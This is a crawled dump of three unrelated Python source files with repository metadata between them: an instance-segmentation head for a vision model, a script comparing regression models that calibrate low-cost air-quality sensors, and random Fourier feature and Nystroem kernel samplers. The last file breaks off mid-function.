L, 5 + self.vae_cfg.token_length)[num_objects:, 5:] = -100
return input_seq
def forward(self, feats, img_metas, input_seq=None):
num_levels = len(feats)
img_metas_list = [img_metas for _ in range(num_levels)]
input_seq_list = [input_seq for _ in range(num_levels)]
return multi_apply(self.forward_single, feats, img_metas_list, input_seq_list)
def forward_single(self, x, img_metas, input_seq):
batch_size = x.size(0)
input_img_h, input_img_w = img_metas[0]['batch_input_shape']
if self.with_mask:
masks = x.new_ones((batch_size, input_img_h, input_img_w))
for img_id in range(batch_size):
img_h, img_w, _ = img_metas[img_id]['img_shape']
masks[img_id, :img_h, :img_w] = 0
else:
masks = x.new_zeros((batch_size, input_img_h, input_img_w))
# interpolate masks to have the same spatial shape with x
masks = F.interpolate(
masks.unsqueeze(1), size=x.shape[-2:]).to(torch.bool).squeeze(1)
# outs_dec: [bs, num_query, embed_dim]
outs_dec = self.transformer(
x, input_seq, masks, self.task_id, pred_len=self.num_query*(5+self.mask_token_length))
return (outs_dec,)
@force_fp32(apply_to=('out_seq'))
def loss2(self,
out_seq,
target_seq
):
# NOTE defaultly only the outputs from the last feature scale is used.
# only for log purpose
B, L, C = out_seq.shape
out_seq_objs = out_seq.view(B, -1, 5+self.mask_token_length, C)
target_seq_objs = target_seq.view(B, -1, 5+self.mask_token_length)
out_seq_box = out_seq_objs[:, :, :4, :].reshape(-1, self.num_vocal)
target_seq_box = target_seq_objs[:, :, :4].flatten()
num_pos_box = (target_seq_box > -1).sum()
bbox_ce = self.loss_seq(
out_seq_box, target_seq_box) / num_pos_box.clamp(min=1)
if self.mask_before_label:
out_seq_cls = out_seq_objs[:, :, -1, :].reshape(-1, self.num_vocal)
target_seq_cls = target_seq_objs[:, :, -1].flatten()
num_pos_cls = (target_seq_cls > -1).sum()
cls_ce = self.loss_seq(
out_seq_cls, target_seq_cls) / num_pos_cls.clamp(min=1)
out_seq_mask = out_seq_objs[:, :, 4:4 +
self.vae_cfg.token_length, :].reshape(-1, self.num_vocal)
target_seq_mask = target_seq_objs[:, :,
4:4+self.vae_cfg.token_length].flatten()
num_pos_mask = (target_seq_mask > -1).sum()
mask_ce = self.loss_seq(
out_seq_mask, target_seq_mask) / num_pos_mask.clamp(min=1)
else:
out_seq_cls = out_seq_objs[:, :, 4, :].reshape(-1, self.num_vocal)
target_seq_cls = target_seq_objs[:, :, 4].flatten()
num_pos_cls = (target_seq_cls > -1).sum()
cls_ce = self.loss_seq(
out_seq_cls, target_seq_cls) / num_pos_cls.clamp(min=1)
out_seq_mask = out_seq_objs[:, :, 5:,
:].reshape(-1, self.num_vocal)
target_seq_mask = target_seq_objs[:, :, 5:].flatten()
num_pos_mask = (target_seq_mask > -1).sum()
mask_ce = self.loss_seq(
out_seq_mask, target_seq_mask) / num_pos_mask.clamp(min=1)
num_obj = num_pos_mask // self.vae_cfg.token_length
num_obj = num_obj.clamp(max=self.max_obj_decoderloss)
if self.decoder_loss_weight > 0. and num_obj > 0.:
assert B == 1
vae_reso = int(sqrt(self.vae_cfg.token_length))
vae_mask = out_seq_mask[:, self.mask_offset: self.mask_offset+self.vae_cfg.num_embeddings].view(
-1, vae_reso, vae_reso, self.vae_cfg.num_embeddings).permute(0, 3, 1, 2)
soft_mask = self.vqvae.decode_soft(vae_mask[:num_obj])
decoder_aux_ce = self.dice_loss_weight * \
dice_loss(
soft_mask, self.mask[:num_obj]) + F.mse_loss(soft_mask, self.mask[:num_obj])
else:
decoder_aux_ce = torch.tensor(
0., device=f'cuda:{torch.cuda.current_device()}')
out_seq = out_seq.reshape(-1, self.num_vocal)
target_seq = target_seq.flatten()
loss_seq = self.loss_seq(out_seq, target_seq)
loss_dict = {'loss': (loss_seq + decoder_aux_ce * self.decoder_loss_weight *
num_pos_mask * self.mask_weight) * self.loss_weight}
loss_dict.update({'cls_ce': cls_ce, 'bbox_ce': bbox_ce,
'mask_ce': mask_ce, 'decoder_aux_ce': decoder_aux_ce})
return loss_dict
def corrupt_label(self, input_seq):
if self.class_label_corruption == 'none':
return input_seq
N, L = input_seq.shape[0], input_seq.shape[1]//(
5+self.mask_token_length)
device = input_seq.device
randlabel = torch.randint(
self.num_classes, (N, L), device=device) + self.class_offset
noiselabel = torch.full((N, L), self.noise_label,
device=device) # noise label
if self.class_label_corruption == 'rand_n_fake_cls':
corruptlabel = torch.where(torch.rand(
(N, L), device=device) < 0.5, randlabel, noiselabel)
elif self.class_label_corruption == 'rand_cls':
corruptlabel = randlabel
else:
raise NotImplementedError
if self.mask_before_label:
input_seq.view(
N, L, 5+self.mask_token_length)[:, :, -1] = corruptlabel
else:
input_seq.view(
N, L, 5+self.mask_token_length)[:, :, 4] = corruptlabel
return input_seq
def get_seq(self,
img_metas,
gt_bboxes,
gt_labels=None,
gt_masks=None,
gt_bboxes_ignore=None,
proposal_cfg=None,
):
assert proposal_cfg is None, '"proposal_cfg" must be None'
# random permute box
device = gt_labels[0].device
gt_masktoken_list = []
rand_idx_list = []
for idx in range(len(gt_labels)):
rand_idx = torch.randperm(len(gt_labels[idx]), device=device)
gt_labels[idx] = gt_labels[idx][rand_idx]
gt_bboxes[idx] = gt_bboxes[idx][rand_idx]
# crop mask
mask = crop_and_resize_gpu(
gt_masks[idx], gt_bboxes[idx], self.mask_size, rand_idx, device=device)
self.mask = mask
mask_token = self.vqvae.encode(mask)
gt_masktoken_list.append(mask_token)
rand_idx_list.append(rand_idx)
input_seq, bad_bbox_flag_list = self.build_input_seq(list(zip(gt_bboxes, gt_masktoken_list, gt_masks, rand_idx_list, gt_labels, [
img_meta['img_shape'][:2] for img_meta in img_metas])), max_objects=self.num_query)
input_seq_corruptlabel = self.corrupt_label(input_seq.clone())[:, :-1]
target_seq = self.get_targets(input_seq, [len(
gt_label) for gt_label in gt_labels], bad_bbox_flag_list) # set -100 ignore
return input_seq_corruptlabel, target_seq
@force_fp32(apply_to=('all_cls_scores_list', 'all_bbox_preds_list'))
def get_bboxes(self,
all_cls_scores_list,
img_metas,
rescale=False):
# NOTE defaultly only using outputs from the last feature level,
# and only the outputs from the last decoder layer is used.
cls_scores = all_cls_scores_list[-1]
result_list = []
for img_id in range(len(img_metas)):
cls_score = cls_scores[img_id]
img_shape = img_metas[img_id]['img_shape']
ori_shape = img_metas[img_id]['ori_shape']
scale_factor = img_metas[img_id]['scale_factor']
proposals = self._get_bboxes_single(cls_score,
img_shape, ori_shape, scale_factor,
rescale)
result_list.append(proposals)
return result_list
def _get_bboxes_single(self,
cls_score,
img_shape,
ori_shape,
scale_factor,
rescale=False):
if len(cls_score) == 2:
pred_token, pred_score = cls_score
pred_mask_logits = None
else:
pred_token, pred_score, pred_mask_logits = cls_score
# pred_token = pred_token.long()
seq_len = pred_token.shape[0]
obj_len = 5 + self.mask_token_length
if seq_len < obj_len:
device, dtype = pred_score.device, pred_score.dtype
return torch.tensor([], device=device, dtype=dtype), torch.tensor([], device=device, dtype=torch.long), torch.empty((0, ori_shape[0], ori_shape[1]), device=device, dtype=torch.bool)
num_objects = seq_len // obj_len
pred_token = pred_token[:int(
num_objects * obj_len)].reshape(num_objects, obj_len)
if self.mask_before_label:
pred_bbox_token = pred_token[:, :4]
pred_class_token = pred_token[:, -1].long()
pred_mask_token = pred_token[:, 4:4 +
self.vae_cfg.token_length].long()
else:
pred_bbox_token = pred_token[:, :4]
pred_class_token = pred_token[:, 4].long()
pred_mask_token = pred_token[:, 5:].long()
if self.coord_norm == 'abs':
boxes_per_image = pred_bbox_token * self.norm_val / self.num_bins
else:
boxes_per_image = pred_bbox_token / self.num_bins
boxes_per_image[:, 0::2] = boxes_per_image[:, 0::2] * img_shape[1]
boxes_per_image[:, 1::2] = boxes_per_image[:, 1::2] * img_shape[0]
if rescale:
boxes_per_image /= boxes_per_image.new_tensor(scale_factor)
if pred_mask_logits is None: # hard inf
seg_masks = self.decode_mask(
pred_mask_token, boxes_per_image, ori_shape, soft_inf=False)
else: # soft inf
seg_masks = self.decode_mask(
pred_mask_logits, boxes_per_image, ori_shape, soft_inf=True)
return torch.cat((boxes_per_image, pred_score[:num_objects].unsqueeze(-1)), dim=-1), pred_class_token, seg_masks
def decode_mask(self, mask_token, bboxes, ori_shape, soft_inf=False):
img_h, img_w = ori_shape[:2]
device = mask_token.device
# N, 1, H, W
if soft_inf:
_N, _L, _C = mask_token.shape
mask_token = mask_token.transpose(1, 2).reshape(
_N, _C, int(sqrt(_L)), int(sqrt(_L)))
mask_pred = self.vqvae.decode_soft(
mask_token).unsqueeze(1) # mask_token is mask_logits
else:
mask_pred = self.vqvae.decode(mask_token).unsqueeze(1)
N = len(mask_pred)
# The actual implementation split the input into chunks,
# and paste them chunk by chunk.
if device.type == 'cpu':
# CPU is most efficient when they are pasted one by one with
# skip_empty=True, so that it performs minimal number of
# operations.
num_chunks = N
else:
# GPU benefits from parallelism for larger chunks,
# but may have memory issue
# the types of img_w and img_h are np.int32,
# when the image resolution is large,
# the calculation of num_chunks will overflow.
# so we need to change the types of img_w and img_h to int.
# See https://github.com/open-mmlab/mmdetection/pull/5191
num_chunks = int(
np.ceil(N * int(img_h) * int(img_w) * BYTES_PER_FLOAT /
GPU_MEM_LIMIT))
assert (num_chunks <=
N), 'Default GPU_MEM_LIMIT is too small; try increasing it'
chunks = torch.chunk(torch.arange(N, device=device), num_chunks)
im_mask = torch.zeros(
N,
img_h,
img_w,
device=device,
dtype=torch.bool)
for inds in chunks:
masks_chunk, spatial_inds = _do_paste_mask(
mask_pred[inds],
bboxes[inds],
img_h,
img_w,
skip_empty=device.type == 'cpu')
# must use >0 because of grid_sample padding 0.
# version change to >= 0.5 and add denorm before
masks_chunk = (masks_chunk >= 0.5).to(dtype=torch.bool)
im_mask[(inds, ) + spatial_inds] = masks_chunk
return im_mask
def simple_test(self, feats, img_metas, rescale=False):
# forward of this head requires img_metas
outs = self.forward(feats, img_metas)
results_list = self.get_bboxes(*outs, img_metas, rescale=rescale)
return results_list
def dice_loss(inputs, targets):
"""
Compute the DICE loss, similar to generalized IOU for masks
Args:
inputs: A float tensor of arbitrary shape.
The predictions for each example.
targets: A float tensor with the same shape as inputs. Stores the binary
classification label for each element in inputs
(0 for the negative class and 1 for the positive class).
"""
# inputs = inputs.sigmoid()
# assert inputs.max() <= 1 and inputs.min() >= 0
inputs = inputs.clip(min=0., max=1.)
inputs = inputs.flatten(1)
targets = targets.flatten(1)
numerator = 2 * (inputs * targets).sum(-1)
denominator = inputs.sum(-1) + targets.sum(-1)
loss = 1 - (numerator + 1) / (denominator + 1)
return loss.mean()
def sigmoid_focal_loss(inputs, targets, alpha: float = 0.25, gamma: float = 2):
"""
Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002.
Args:
inputs: A float tensor of arbitrary shape.
The predictions for each example.
targets: A float tensor with the same shape as inputs. Stores the binary
classification label for each element in inputs
(0 for the negative class and 1 for the positive class).
alpha: (optional) Weighting factor in range (0,1) to balance
positive vs negative examples. Default = -1 (no weighting).
gamma: Exponent of the modulating factor (1 - p_t) to
balance easy vs hard examples.
Returns:
Loss tensor
"""
prob = inputs.sigmoid()
ce_loss = F.binary_cross_entropy_with_logits(
inputs, targets, reduction="none")
p_t = prob * targets + (1 - prob) * (1 - targets)
loss = ce_loss * ((1 - p_t) ** gamma)
if alpha >= 0:
alpha_t = alpha * targets + (1 - alpha) * (1 - targets)
loss = alpha_t * loss
return loss.mean()
def crop_and_resize_gpu(bitmapmasks,
bboxes,
out_shape,
inds,
device='cpu',
interpolation='bilinear',
binarize=True):
"""See :func:`BaseInstanceMasks.crop_and_resize`."""
if len(bitmapmasks.masks) == 0:
return torch.empty((0, *out_shape), dtype=bboxes.dtype, device=device)
# convert bboxes to tensor
if isinstance(bboxes, np.ndarray):
bboxes = torch.from_numpy(bboxes).to(device=device)
if isinstance(inds, np.ndarray):
inds = torch.from_numpy(inds).to(device=device)
num_bbox = bboxes.shape[0]
fake_inds = torch.arange(
num_bbox, device=device).to(dtype=bboxes.dtype)[:, None]
rois = torch.cat([fake_inds, bboxes], dim=1) # Nx5
rois = rois.to(device=device)
if num_bbox > 0:
gt_masks_th = torch.from_numpy(bitmapmasks.masks).to(device).index_select(
0, inds).to(dtype=rois.dtype)
targets = roi_align(gt_masks_th[:, None, :, :], rois, out_shape,
1.0, 0, 'avg', True).squeeze(1)
if binarize:
resized_masks = (targets >= 0.5)
else:
resized_masks = targets
else:
resized_masks = torch.empty(
(0, *out_shape), dtype=bboxes.dtype, device=device)
return resized_masks.to(dtype=bboxes.dtype)
def _do_paste_mask(masks, boxes, img_h, img_w, skip_empty=True):
"""Paste instance masks according to boxes.
This implementation is modified from
https://github.com/facebookresearch/detectron2/
Args:
masks (Tensor): N, 1, H, W
boxes (Tensor): N, 4
img_h (int): Height of the image to be pasted.
img_w (int): Width of the image to be pasted.
skip_empty (bool): Only paste masks within the region that
tightly bound all boxes, and returns the results this region only.
An important optimization for CPU.
Returns:
tuple: (Tensor, tuple). The first item is mask tensor, the second one
is the slice object.
If skip_empty == False, the whole image will be pasted. It will
return a mask of shape (N, img_h, img_w) and an empty tuple.
If skip_empty == True, only area around the mask will be pasted.
A mask of shape (N, h', w') and its start and end coordinates
in the original image will be returned.
"""
# On GPU, paste all masks together (up to chunk size)
# by using the entire image to sample the masks
# Compared to pasting them one by one,
# this has more operations but is faster on COCO-scale dataset.
device = masks.device
if skip_empty:
x0_int, y0_int = torch.clamp(
boxes.min(dim=0).values.floor()[:2] - 1,
min=0).to(dtype=torch.int32)
x1_int = torch.clamp(
boxes[:, 2].max().ceil() + 1, max=img_w).to(dtype=torch.int32)
y1_int = torch.clamp(
boxes[:, 3].max().ceil() + 1, max=img_h).to(dtype=torch.int32)
else:
x0_int, y0_int = 0, 0
x1_int, y1_int = img_w, img_h
x0, y0, x1, y1 = torch.split(boxes, 1, dim=1) # each is Nx1
N = masks.shape[0]
img_y = torch.arange(y0_int, y1_int, device=device).to(torch.float32) + 0.5
img_x = torch.arange(x0_int, x1_int, device=device).to(torch.float32) + 0.5
img_y = (img_y - y0) / (y1 - y0) * 2 - 1
img_x = (img_x - x0) / (x1 - x0) * 2 - 1
# img_x, img_y have shapes (N, w), (N, h)
# IsInf op is not supported with ONNX<=1.7.0
if not torch.onnx.is_in_onnx_export():
if torch.isinf(img_x).any():
inds = torch.where(torch.isinf(img_x))
img_x[inds] = 0
if torch.isinf(img_y).any():
inds = torch.where(torch.isinf(img_y))
img_y[inds] = 0
gx = img_x[:, None, :].expand(N, img_y.size(1), img_x.size(1))
gy = img_y[:, :, None].expand(N, img_y.size(1), img_x.size(1))
grid = torch.stack([gx, gy], dim=3)
img_masks = F.grid_sample(
masks.to(dtype=torch.float32), grid, align_corners=False)
if skip_empty:
return img_masks[:, 0], (slice(y0_int, y1_int), slice(x0_int, x1_int))
else:
return img_masks[:, 0], ()
| paperwave/AiT | ait/code/model/detection/insseg_head.py | insseg_head.py | py | 31,161 | python | en | code | null | github-code | 1 | [
{
"api_name": "mmcv.runner.BaseModule",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "model.build_model",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "torch.nn.CrossEn... |
20578247223 | import numpy as np
import pandas as pd
import statsmodels.api as sm
from pandas.tseries.offsets import MonthEnd
from prettytable import PrettyTable, MARKDOWN
from sklearn.kernel_ridge import KernelRidge
from sklearn.linear_model import LassoCV, RidgeCV
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from regression.regression_models import *
from utils.utils import Dataset, get_dataset
def get_regressors():
return [
'Lineare',
'Lineare robusto (Huber)',
'Lineare avanzato (Cook)',
'Ridge',
'Lasso',
'Polinomiale (grado 2)',
'Polinomiale (grado 3)',
'Random Forest',
'Gradient Boosting',
'SVR (Kernel lineare)',
'SVR (Kernel polinomiale)',
'SVR (Kernel RBF)',
'KernelRidge'
]
def get_regressors_smaller():
return [
'Lineare',
'Lineare robusto (Huber)',
'Lineare avanzato (Cook)',
'Ridge',
'Lasso',
'Polinomiale (grado 2)',
'Polinomiale (grado 3)',
'Random Forest',
'Gradient Boosting',
'SVR (lineare)',
'SVR (polinomiale)',
'SVR (RBF)',
'KernelRidge'
]
def avg(scores):
return '%0.2f' % (sum(scores) / len(scores))
def make_avg(predictor, X, y, n=500):
r2_scores, rmse_scores = [], []
for _ in range(n):
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, shuffle=True)
predictor.fit(X_train, y_train)
r2_scores.append(predictor.score(X_test, y_test))
rmse_scores.append(mean_squared_error(y_test, predictor.predict(X_test), squared=False))
return avg(r2_scores), avg(rmse_scores)
def apply_linear_regression(X, y):
return make_avg(get_linear_model(), X, y)
def apply_cook_regression(X, y):
m = sm.OLS(y, sm.add_constant(X)).fit()
infl = m.get_influence()
soglia = 4 / len(X)
(a, p) = infl.cooks_distance
mask = a < soglia
return make_avg(get_linear_model(), X[mask], y[mask])
def apply_huber_regression(X, y):
return make_avg(get_huber_model(), X, y)
def apply_lasso_regression(X, y):
lassoregcv = LassoCV(n_alphas=100, random_state=1)
model = make_pipeline(StandardScaler(with_mean=False), lassoregcv)
return make_avg(model, X, y)
def apply_ridge_regression(X, y):
alpha_range = 10. ** np.arange(-2, 5)
ridgereg = RidgeCV(alphas=alpha_range, scoring='neg_mean_squared_error')
model = make_pipeline(StandardScaler(with_mean=False), ridgereg)
return make_avg(model, X, y)
def apply_poly_regression(X, y):
return make_avg(get_polynomial_model(), X, y)
def apply_poly_3_regression(X, y):
m = make_pipeline(PolynomialFeatures(degree=3, include_bias=False), linear_model.LinearRegression(n_jobs=-1))
return make_avg(m, X, y)
def apply_kridge_regression(X, y):
kr = make_pipeline(StandardScaler(with_mean=False),
KernelRidge(alpha=1, kernel='poly', degree=2, gamma=1, coef0=1))
return make_avg(kr, X, y)
def apply_random_forest_regression(X, y):
return make_avg(get_random_forest_model(), X, y)
def apply_gradient_boosting_regression(X, y):
return make_avg(get_gradient_boosting_model(), X, y)
def apply_svr_linear_regression(X, y):
return make_avg(get_svr_linear_model(), X, y)
def apply_svr_polynomial_regression(X, y):
return make_avg(get_svr_polynomial_model(), X, y)
def apply_rbf_polynomial_regression(X, y):
return make_avg(get_svr_rbf_model(), X, y)
def evaluate(X, y):
lr_score, lr_rmse = apply_linear_regression(X, y)
huber_score, huber_rmse = apply_huber_regression(X, y)
cook_score, cook_rmse = apply_cook_regression(X, y)
ridge_score, ridge_rmse = apply_ridge_regression(X, y)
lasso_score, lasso_rmse = apply_lasso_regression(X, y)
kridge_score, kridge_rmse = apply_kridge_regression(X, y)
poly_score, poly_rmse = apply_poly_regression(X, y)
poly3_score, poly3_rmse = apply_poly_3_regression(X, y)
rf_score, rf_rmse = apply_random_forest_regression(X, y)
gb_score, gb_rmse = apply_gradient_boosting_regression(X, y)
svr_lin_score, svr_lin_rmse = apply_svr_linear_regression(X, y)
svr_poly_score, svr_poly_rmse = apply_svr_polynomial_regression(X, y)
svr_rbf_score, svr_rbf_rmse = apply_rbf_polynomial_regression(X, y)
r2_scores = [lr_score, huber_score, cook_score, ridge_score, lasso_score, poly_score, poly3_score, rf_score,
gb_score, svr_lin_score, svr_poly_score,
svr_rbf_score, kridge_score]
rmse_scores = [lr_rmse, huber_rmse, cook_rmse, ridge_rmse, lasso_rmse, poly_rmse, poly3_rmse, rf_rmse, gb_rmse,
svr_lin_rmse, svr_poly_rmse,
svr_rbf_rmse, kridge_rmse]
return r2_scores, rmse_scores
def print_annual_results(results, title):
table = PrettyTable()
# table.title = title
table.add_column('Modello di regressione', get_regressors())
table.add_column('R²', results[0])
table.add_column('RMSE (µg/m³)', results[1])
table.align = 'l'
table.set_style(MARKDOWN)
print(table)
def print_monthly_results(month_results, title):
def construct_table(i):
t = PrettyTable()
# t.title = '{} | '.format('R²' if i == 0 else 'RMSE (µg/m³)') + title
t.add_column('Modello', get_regressors_smaller())
for res in month_results:
if any(res['results'][i]):
t.add_column(res['period'], res['results'][i])
t.align = 'l'
return t
# R²
table = construct_table(0)
table.set_style(MARKDOWN)
print(table)
# RMSE
table = construct_table(1)
table.set_style(MARKDOWN)
print(table)
def annual_summary(dataset, station, chemical):
X = dataset['airqino_{}'.format(chemical)].values.reshape((-1, 1))
y = dataset['arpat_{}'.format(chemical)].values
results = evaluate(X, y)
print_annual_results(results,
title='All year | {n} | {c} (n={l})'.format(c=chemical.upper(), n=station,
l=str(len(dataset))))
def monthly_summary(dataset, station, chemical, is_24h=False):
if chemical == 'no2':
date_range = pd.date_range('2020-01-01', '2020-12-31', freq='MS')
else:
date_range = pd.date_range('2020-09-01', '2021-08-31', freq='MS')
month_results = []
for month in date_range:
month_str = month.strftime('%b')
month_start = month.strftime('%Y-%m-%d')
month_end = (month + MonthEnd(1)).strftime('%Y-%m-%d')
month_dataset = dataset.loc[month_start: month_end]
threshold = 5 if is_24h else 70
if month_dataset.empty or len(month_dataset.index) < threshold:
month_results.append({
'results': [[0 for _ in get_regressors()], [0 for _ in get_regressors()]],
'period': month_str,
'values_count': str(len(month_dataset.index))
})
continue
X = month_dataset['airqino_{}'.format(chemical)].values.reshape((-1, 1))
y = month_dataset['arpat_{}'.format(chemical)].values
results = evaluate(X, y)
month_results.append({'results': results, 'period': month_str, 'values_count': str(len(y))})
print_monthly_results(month_results, title='Monthly results | {d} | {c}'.format(c=chemical.upper(), d=station))
if __name__ == '__main__':
# SMART16 - NO2
# dataset = get_dataset(Dataset.SMART16_NO2).loc['2020-01-18': '2020-12-31']
# annual_summary(dataset=dataset, station='SMART16-CAPANNORI', chemical='no2')
# monthly_summary(dataset=dataset, station='SMART16-CAPANNORI', chemical='no2')
# SMART16_new - PM2.5
# annual_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm2.5')
# monthly_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm2.5')
# SMART16_new - PM10
# annual_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm10')
# monthly_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm10')
# SMART16_new - PM2.5 - 8H
# annual_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-8h', 'pm2.5')
# monthly_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-12h', 'pm2.5', is_24h=True)
# SMART16_new - PM10 - 8H
# annual_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-8h', 'pm10')
monthly_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-8h', 'pm10', is_24h=True)
| n3d1117/airqino-calibration | regression/regression_summary.py | regression_summary.py | py | 8,833 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.mean_squared_error",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "statsmodels.api.OLS",
"line_number": 71,
"usage_type": "call"... |
70352039714 | from data_objects.random_cycler import RandomCycler
from data_objects.utterance import Utterance
from pathlib import Path
"""Minimally altered code from https://github.com/Trebolium/Real-Time-Voice-Cloning/tree/master/encoder/data_objects"""
# Contains the set of utterances of a single speaker
class Speaker:
def __init__(self, root: Path):
self.root = root
self.name = root.name
self.utterances = None
self.utterance_cycler = None
def _load_utterances(self, num_feats):
""" Utterance stores mel and wav paths, but does not make them npy objects until random_partial() is called"""
spkr_uttrs_list = [f.name[:-4] for f in self.root.glob('*.npy')]
self.utterances = [Utterance(self.root.joinpath(f+'.npy'), f+'.wav') for f in spkr_uttrs_list]
self.utterance_cycler = RandomCycler(self.utterances)
def random_partial(self, count, n_frames, num_feats):
"""
Samples a batch of <count> unique partial utterances from the disk in a way that all
utterances come up at least once every two cycles and in a random order every time.
:param count: The number of partial utterances to sample from the set of utterances from
that speaker. Utterances are guaranteed not to be repeated if <count> is not larger than
the number of utterances available.
:param n_frames: The number of frames in the partial utterance.
:return: A list of tuples (utterance, frames, range) where utterance is an Utterance,
frames are the frames of the partial utterances and range is the range of the partial
utterance with regard to the complete utterance.
"""
if self.utterances is None:
self._load_utterances(num_feats)
utterances = self.utterance_cycler.sample(count)
"""Utterance random__partial returns: (splice of numpy, (start/end values))"""
a = [(u,) + u.random_partial(n_frames, num_feats) for u in utterances]
""" a is a list of tuples (uttr objects, spliced uttr_features, start/end coords), size of count"""
return a
| Trebolium/singer_id_encoder | data_objects/speaker.py | speaker.py | py | 2,155 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "data_objects.utterance.Utterance",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "data_objects.random_cycler.RandomCycler",
"line_number": 20,
"usage_type": "call"
}
] |
27510683969 | """
Author: alberto.suarez@uam.es
Coauthors: joseantonio.alvarezo@estudiante.uam.es
franciscojavier.saez@estudiante.uam.es
"""
import warnings
from abc import ABC, abstractmethod
from typing import Callable, Optional, Union, Type
from sklearn.gaussian_process.kernels import RBF
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
# needed for default implementation of set_params
from sklearn.base import BaseEstimator, TransformerMixin
class RandomFeaturesSampler(ABC, BaseEstimator, TransformerMixin):
"""Base class for random feature samplers."""
def __init__(self, n_random_features: int) -> None:
self.n_random_features = n_random_features
self.w = None
def _initialize_w(self, n_features: int) -> np.ndarray:
pass
@abstractmethod
def fit(self, X: np.ndarray) -> np.ndarray:
"""Initialize w's for the random features.
This should be implemented for each kernel."""
pass
def fit_transform(
self, X: np.ndarray, X_prime: Optional[np.ndarray] = None
) -> np.ndarray:
"""Initialize w's (fit) & compute random features (transform)."""
n_features = np.shape(X)[1]
self.fit(n_features)
return self.transform(X)
def transform(self, X: np.ndarray) -> np.ndarray:
"""Compute the random features.
Assumes that the vector of w's has been initialized
Parameters
----------
X:
Data matrix of shape (n_instances, n_features).
Returns
-------
random_features:
Array of shape (n_instances, n_random_features).
"""
if self.w is None:
raise ValueError("Use fit_transform to initialize w.")
n_instances, n_features = np.shape(X)
if np.shape(self.w)[1] != n_features:
raise ValueError("Different # of features for X and w.")
random_features = np.empty((n_instances, self.n_random_features))
random_features[:, ::2] = np.cos(X @ self.w.T)
random_features[:, 1::2] = np.sin(X @ self.w.T)
norm_factor = np.sqrt(self.n_random_features // 2)
random_features = random_features / norm_factor
return random_features
class RandomFeaturesSamplerRBF(RandomFeaturesSampler):
"""Random Fourier Features for the RBF kernel."""
def __init__(self, sigma: float = 1.0, n_random_features: int = 100) -> None:
self.sigma = sigma
# Initialize number of random features in parent class
super().__init__(n_random_features)
def fit(self, n_features: int = 100) -> np.ndarray:
"""Initialize the w's for the random features."""
w_mean = np.zeros(n_features)
w_cov_matrix = self.sigma**2 * np.identity(n_features)
rng = np.random.default_rng()
self.w = rng.multivariate_normal(
w_mean,
w_cov_matrix,
self.n_random_features // 2,
)
class RandomFeaturesSamplerMatern(RandomFeaturesSampler):
"""Random Fourier Features for the Matern kernel."""
def __init__(
self, scale: float = 1.0, nu: float = 1.0, n_random_features: int = 100
) -> None:
"""The Fourier transform of the Matérn kernel is a
Student's t distribution with twice the degrees of freedom.
Ref. Chapter 4 of
Carl Edward Rasmussen and Christopher K. I. Williams. 2005.
Gaussian Processes for Machine Learning
(Adaptive Computation and Machine Learning). The MIT Press.
There is probably a mistake with the scale factor.
"""
# Changed variables since they CANNNOT be modified due to sklearn GridSearch
# self.nu = 2.0 * nu
self.nu = nu
# Changed name from original's author name due to incompatibility with sklearn
self.scale = scale
super().__init__(n_random_features)
self.w = None
def fit(self, n_features: int) -> np.ndarray:
"""Compute w's for random Matérn features."""
# Scale of the Fourier tranform of the kernel
w_mean = np.zeros(n_features)
w_cov_matrix = self.scale**2 * np.identity(n_features)
self.w = random_multivariate_student_t(
w_mean,
w_cov_matrix,
self.nu,
self.n_random_features // 2,
)
def random_multivariate_student_t(
mean: np.ndarray,
cov_matrix: np.ndarray,
degrees_of_freedom: float,
n_samples: int,
) -> np.ndarray:
"""Generate samples from a multivariate Student's t.
https://en.wikipedia.org/wiki/Multivariate_t-distribution#Definition
"""
# Dimensions of multivariate Student's t distribution.
D = len(mean)
rng = np.random.default_rng()
x = rng.chisquare(degrees_of_freedom, n_samples) / degrees_of_freedom
Z = rng.multivariate_normal(
np.zeros(D),
cov_matrix,
n_samples,
)
X = mean + Z / np.sqrt(x)[:, np.newaxis]
return X
class NystroemFeaturesSampler(BaseEstimator, TransformerMixin):
"""Sample Nystroem features."""
def __init__(
self,
kernel: Callable[[np.ndarray, np.ndarray], np.ndarray] = RBF(),
n_random_features: int = 100,
) -> None:
# _kernel -> kernel due to SKlearn compatibility
self.kernel = kernel
self.component_indices_ = None
# J
self._X_reduced = None
# W
self._reduced_kernel_matrix = None
# (W+)^1/2
self._sqrtm_pinv_reduced_kernel_matrix = None
# Needed for compatibility
self.n_random_features = n_random_features
def fit(
self, X: np.ndarray, y: Optional[np.ndarray] = None # Compatibility
) -> np.ndarray:
"""Precompute auxiliary quantities for Nystroem features."""
n_instances = len(X)
# Check dimensions to avoid selecting more features than
# possible
n_random_features = self.n_random_features
if self.n_random_features > n_instances:
n_random_features = n_instances
# Sample subset of training instances.
rng = np.random.default_rng()
self.component_indices_ = rng.choice(
range(n_instances),
size=n_random_features,
replace=False,
)
self._X_reduced = X[self.component_indices_, :]
# Compute reduced kernel matrix.
self._reduced_kernel_matrix = self.kernel(self._X_reduced, self._X_reduced)
